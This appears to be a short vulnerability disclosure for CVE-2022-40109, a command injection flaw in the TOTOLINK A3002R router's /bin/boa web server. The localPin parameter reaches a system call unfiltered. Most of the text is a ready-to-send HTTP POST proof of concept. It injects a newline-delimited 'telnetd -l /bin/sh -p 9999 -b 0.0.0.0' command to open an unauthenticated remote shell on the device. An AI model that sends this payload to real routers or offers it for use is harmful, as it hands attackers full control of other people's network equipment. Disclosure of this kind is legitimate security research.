Headline
CVE-2022-40109: iot/1.md at main · 1759134370/iot
TOTOLINK A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128 is vulnerable to Insecure Permissions via binary /bin/boa.
Vulnerability occurs: localPin in the sub_4479D4 function in binary /bin/boa receives parameters from the front end and then concatenates them directly into the system to run without filtering
POST /boafrm/formWsc HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/wlwps.htm
Cookie: xxid=1488794641
submit-url=%2Fwlwps.htm&resetUnCfg=0&localPin=%0atelnetd -l /bin/sh -p 9999 -b 0.0.0.0%0a&targetAPMac=&targetAPSsid=&peerPin=&configVxd=off&resetRptUnCfg=0
The ports 9999 and 10000 were reappeared after I changed the ports once, which did not affect the results